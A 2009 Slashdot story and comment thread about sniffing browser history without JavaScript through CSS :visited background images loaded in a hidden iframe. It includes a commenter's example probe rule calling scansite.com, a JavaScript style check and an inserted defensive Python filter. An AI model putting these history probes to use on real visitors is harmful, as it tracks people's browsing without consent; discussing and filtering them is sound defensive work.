Sniffing Browser History Without Javascript

Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."
  • For the Masses (Score:1, Interesting)

    by retech ( 1228598 ) on Saturday June 13, 2009 @08:56PM (#28323773)

    Most people will never understand and basic exploits like this will always work against them. At what point is it the browser's (and app support staff) responsibility to protect the ignorant? The simple fix for this and many things similar is to not cache, don't keep a history, lock your browser down. If you're too stupid to do that... it's kind of your own fault.

    Does a car manufacturer have a responsibility to make you drive safe? They make the car and if you're too stupid to learn how to use it properly you'll be weeded out.
  • Old, sure... (Score:4, Interesting)

    by sootman ( 158191 ) on Saturday June 13, 2009 @09:02PM (#28323795) Homepage Journal

    ... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word--i.e., clever)

  • by Anonymous Coward on Saturday June 13, 2009 @09:03PM (#28323799)

    This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!

  • by Skapare ( 16644 ) on Saturday June 13, 2009 @10:18PM (#28324117) Homepage

    I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc, for each site I visit via the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window": well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

  • by Skapare ( 16644 ) on Saturday June 13, 2009 @10:31PM (#28324153) Homepage

    IMHO a better fix is to completely disable looking up browser history for link styling. Let it treat all links as unvisited if there is no difference in styling these different classes of links. Make it the default to use the same style (most people don't care). Then re-enable the lookup if the styles are changed and the result of the change is 2 or more different styles (and pop up a warning that JS and CSS can see these style variations and this can expose detection of sites you have visited).

  • Re:For the Masses (Score:4, Interesting)

    by dmomo ( 256005 ) on Saturday June 13, 2009 @11:57PM (#28324481)

    It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality all together. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.

    If a page has the rule: a:visited { color: red; }

    And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');

    I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.

    The point here is, the solution is not dead simple.

  • by NimbleSquirrel ( 587564 ) on Sunday June 14, 2009 @12:20AM (#28324579)

    On the surface it seems like NoScript had descended into the point of malware, but take a look into the history of why Giorgio did what he did [hackademix.net] and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.

    Yes, there needs to be a more trustworthy NoScript, but at the same time there also needs to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.

    I, personally, have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.

  • by Barny ( 103770 ) on Sunday June 14, 2009 @12:38AM (#28324675) Journal

    Yeah, I find a proxy based solution much better for keeping the bad things out, also has the bonus of protecting my steam browser, my mobile phone browser (when browsing on my wireless) and other in-game browsers for different games.

    NoScript is to stop a problem specific to that web browser (namely its masochistic tendency to run scripting like it was "the last line of crack it was ever going to get"), whereas ad sites are needed to be blocked no matter what browser you are on (even lynx).

  • Re:Old stuff (Score:1, Interesting)

    by Anonymous Coward on Sunday June 14, 2009 @01:08AM (#28324767)

    The simplest partial solution is to make CSS visited links expire after 1 hour to minimize its effects. Yet still retain the history in your browser for 2 months, so that you can still search it.

  • Re:Old stuff (Score:3, Interesting)

    by Blakey Rat ( 99501 ) on Sunday June 14, 2009 @02:24AM (#28324961)

    Can you perhaps explain the non-Javascript version in simpler terms than what's on the story's webpage? The explanation on the page is either very vague, or over my head. (Or both.)

    I fully understand how you can use Javascript to grab the computed style of the A tag and figure out if it matches the ":visited" style you have defined, but what I don't get is how he's grabbing the style using only server-side technologies. Since when is it possible for a web server to tell the computed style of an element?

  • Re:Old stuff (Score:2, Interesting)

    by rytier ( 175186 ) on Sunday June 14, 2009 @02:25AM (#28324965)

    moderation undo (sorry for OT)...

  • Re:Old stuff (Score:3, Interesting)

    by Blakey Rat ( 99501 ) on Sunday June 14, 2009 @02:33AM (#28324997)

    Oh wait, I think I just got it.

    What he's doing is setting your CSS A:visited property to an image URL, which is defined based on your browser session. Something like:

    a:visited { background-image: url( http://scansite.com/image.gif?s=yahoo_com&c=45353535 ); }

    Then he's coded up a PHP script that'll log the code at the end of the image URL, and track it in your PHP session variable, or a database.

    So, the flowchart looks like:
    1) User visits page
    2) PHP script generates session ID for the visit
    3) PHP script writes an invisible iframe to the page, which includes
      - a link to a Target URL (the URL you're trying to find in the history)
      - a CSS rule defining the A:visited image to be a particular URL + a code for the Target URL + your session ID
      - a meta-refresh tag that instructs the server to refresh the iframe with the next Target URL on the list
    4) When the iframe refreshes, the PHP feeds out a list of which Target URLs your session ID has been seen at

    Ironically, IE's dubious "click on reload/redirect" feature is (currently) the most effective defense against this technique, as the user isn't likely to notice the constant clicks emanating from their browser while this attack is taking place.

    Clever stuff. Someone let me know if I'm off-base on this explanation, but if it's not exactly what he's doing, I'm sure this would work as well.
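
A defender-side check that follows from the mechanism described in this thread, written as an added example (not code from the story or from any commenter): a small Python filter of the kind a content proxy such as Privoxy could apply to fetched stylesheets, flagging and stripping :visited rules that pull a remote url() resource. The sample stylesheet, the scansite.example hostname, the query values and the function names are all constructed for this example.

```python
import re

# Constructed sample stylesheet modelled on the rule described above; the
# hostname scansite.example and the query values are placeholders, not real sites.
SAMPLE_CSS = """
/* ordinary visited styling: harmless, no network fetch */
a:link { color: blue; }
a:visited { color: purple; }
/* history probes: the URL is only fetched if the link was visited */
#probe a:visited { background-image: url( http://scansite.example/image.gif?s=yahoo_com&c=45353535 ); }
a:visited::after { content: url("http://scansite.example/b.png?s=slashdot_org"); }
"""

COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
# Flat "selector { declarations }" rules only; nested @media blocks are not handled.
RULE_RE = re.compile(r'([^{}]+)\{([^{}]*)\}', re.S)
URL_RE = re.compile(r'url\s*\(', re.I)


def find_visited_fetch_rules(css):
    """Return (selector, declaration) pairs where a :visited selector loads a url() resource."""
    findings = []
    for m in RULE_RE.finditer(COMMENT_RE.sub('', css)):
        selector = ' '.join(m.group(1).split())
        if ':visited' not in selector.lower():
            continue
        for decl in m.group(2).split(';'):
            if URL_RE.search(decl):
                findings.append((selector, ' '.join(decl.split())))
    return findings


def neutralize(css):
    """Drop url() declarations from :visited rules; colour-only styling is kept."""
    def fix(m):
        selector, body = m.group(1), m.group(2)
        if ':visited' not in selector.lower():
            return m.group(0)
        kept = [d.strip() for d in body.split(';') if d.strip() and not URL_RE.search(d)]
        return selector + '{ ' + ' '.join(d + ';' for d in kept) + ' }'
    return RULE_RE.sub(fix, COMMENT_RE.sub('', css))


if __name__ == '__main__':
    for selector, decl in find_visited_fetch_rules(SAMPLE_CSS):
        print('history probe:', selector, '->', decl)
    print(neutralize(SAMPLE_CSS))
```

This only addresses the no-JavaScript variant, where the browser itself fetches a resource for visited links; the computed-style check dmomo describes above leaks through colour alone and can only be closed in the browser.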

  • Re:Old stuff (Score:3, Interesting)

    by black6host ( 469985 ) on Sunday June 14, 2009 @02:42AM (#28325023)

    Sure... Me, I can just turn off my history if I don't want sites sniffing it this way. What ever made me think, in this day and age, that anything I do, on the net or not, is private?

    Sorry, not to bash you, just sad commentary.....

  • Re:Old stuff (Score:3, Interesting)

    by Keeper Of Keys ( 928206 ) on Sunday June 14, 2009 @03:37AM (#28325179) Homepage

    I for one would be quite happy if browsers disabled the ability to use the :visited pseudoclass in your own CSS, which would kill this one stone dead. It's hard enough getting designers to specify :hover states for links, and practically impossible to get :active states out of them - if they're even needed, which is debatable. Who bothers with :visited states? In anything other than body text, users are unlikely to understand why a certain link looks different anyway. It is occasionally useful to spot that a link embedded in text is one you've already followed, but invariably this is the browser's default styling showing through. Perhaps values of 'inherit' should be allowed, so you can turn off the browser default, but otherwise... pfff! get rid of it.

  • by Anonymous Coward on Sunday June 14, 2009 @03:55AM (#28325207)

    Hmm, so how does one go about turning off CSS processing in a browser?

  • Re:For the Masses (Score:3, Interesting)

    by Keeper Of Keys ( 928206 ) on Sunday June 14, 2009 @04:00AM (#28325229) Homepage

    is there really a good need or use for a hidden flag on iframes at all??
    I honestly don't know, maybe its one of the more handy features in there, and I just don't see it from the user side of things, but 'hidden' is not an attribute I would ever imagine wanting on a frame or iframe...

    With CSS you can hide anything you want to, in a number of different ways, and there are myriad reasons for wanting to do this. Most ajax sites would look a lot worse if the frames they use to silently load your data in the background were suddenly visible.

  • Re:Old stuff (Score:5, Interesting)

    by Philip_the_physicist ( 1536015 ) on Sunday June 14, 2009 @06:28AM (#28325613)

    Alternatively, make browsers download all the pseudoclasses for links, so that it is impossible for sites to use this to track users, but without removing the utility of having marked "visited" links. This could be done by browsers without needing any change to the standards, AFAICT.

  • Re:Old stuff (Score:3, Interesting)

    by drinkypoo ( 153816 ) <drink@hyperlogos.org> on Sunday June 14, 2009 @11:13AM (#28326629) Homepage Journal

    This could be done by browsers without needing any change to the standards, AFAICT.

    It can't be done without generating a lot of unnecessary bandwidth, though, and harshing major on dialup users (who are already getting their asses kicked hard enough.)

  • Simple... (Score:2, Interesting)

    by BrokenHalo ( 565198 ) on Sunday June 14, 2009 @01:52PM (#28327623)

    No, the simplest solution is to adopt a policy I took up in the late '90s when it first occurred to me that my history might be sniffed:

    Delete it.

    That's right. It's perfectly possible to live a fulfilled life without browser history, or cookies for that matter. In fact, I still have my cookies file symlinked to /dev/null, though I am aware that current browsers offer an option to clear it...
